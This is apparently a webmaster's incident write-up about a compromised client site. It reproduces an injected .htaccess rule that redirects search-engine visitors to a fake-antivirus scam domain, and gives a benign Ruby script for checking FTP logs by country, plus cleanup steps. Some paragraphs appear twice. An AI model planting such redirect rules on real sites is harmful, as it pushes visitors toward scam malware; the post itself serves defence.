Today the website of one of the clients was blacklisted by Google by containing malicious software that downloads and installs without user’s consent. Google displayed “This site may harm your computer” under website in the results page.
Analyzing site’s sources we found obfuscated JavaScript code inserted near body, html tags in .html, .php, .tpl files and a .htaccess file with following content:
Hmm, visitors from search engines were redirected to real-antispyware.info. This website is a scam that shows some JavaScript animation fulling the user with a message that his computer is infected and prompts him to download and install a fake AntiVirus.
Analyzing IP addresses from ftp logs we found connections from Russia and China that altered client’s website. Somehow they got user’s ftp password (it can be done in so many ways: weak password, traffic sniffing, virus, keylogger, trojan, …) and they altered website files.
You can use this simple Ruby script to analyze your ftp logs. By default it is configured for a Plesk server, and it will show suspicious lines (change IGNORE variables to fit your needs). You may need to install rubygems and geoip gem.
Steps that needs to followed:
Analyzing site’s sources we found obfuscated JavaScript code inserted near body, html tags in .html, .php, .tpl files and a .htaccess file with following content:
RewriteEngine On RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*yandex.*$ [NC,OR]^M RewriteCond %{HTTP_REFERER} .*rambler.*$ [NC,OR]^M RewriteCond %{HTTP_REFERER} .*ya.*$ [NC] RewriteRule .* http://real-antispyware.info/0/go.php?sid=2 [R,L]
Analyzing IP addresses from ftp logs we found connections from Russia and China that altered client’s website. Somehow they got user’s ftp password (it can be done in so many ways: weak password, traffic sniffing, virus, keylogger, trojan, …) and they altered website files.
You can use this simple Ruby script to analyze your ftp logs. By default it is configured for a Plesk server, and it will show suspicious lines (change IGNORE variables to fit your needs). You may need to install rubygems and geoip gem.
#!/usr/bin/ruby require 'rubygems' require 'geoip' require 'zlib' # hide logs from these countries # Example: RO US IGNORE_COUNTRIES = %w{RO US} # free geoip database is not 100% accurate # we may need to ignore a few ip addresses IGNORE_IP = %w{127.0.0.1 127.0.0.2} files = Dir.glob("/usr/local/psa/var/log/xferlog*") geoip = GeoIP.new('/var/lib/GeoIP/GeoIP.dat') def ip2country(geoip, ip) country = geoip.country(ip)[3] end ip_list = [] files.each do |filename| puts "" puts "Processing #{filename} ..." File.open(filename) do |f| input = f input = Zlib::GzipReader.new(f) if File.extname(filename) == ".gz" while line = input.gets do ip = line.split(/\s+/)[6] unless ip_list.include? ip country = ip2country(geoip, ip) unless IGNORE_COUNTRIES.include? country.upcase or IGNORE_IP.include? ip puts " [#{country} : #{ip}] => #{line}" end ip_list << ip end end end end
- Change FTP password
- Upload a clean copy from the backups of the website
- Submit the website in the Webmaster’s Tools for reconsideration
- Audit your company security: computers, firewalls, antiviruses, software, …
http://www.google.com/safebrowsing/diagnostic?site=http://example.com
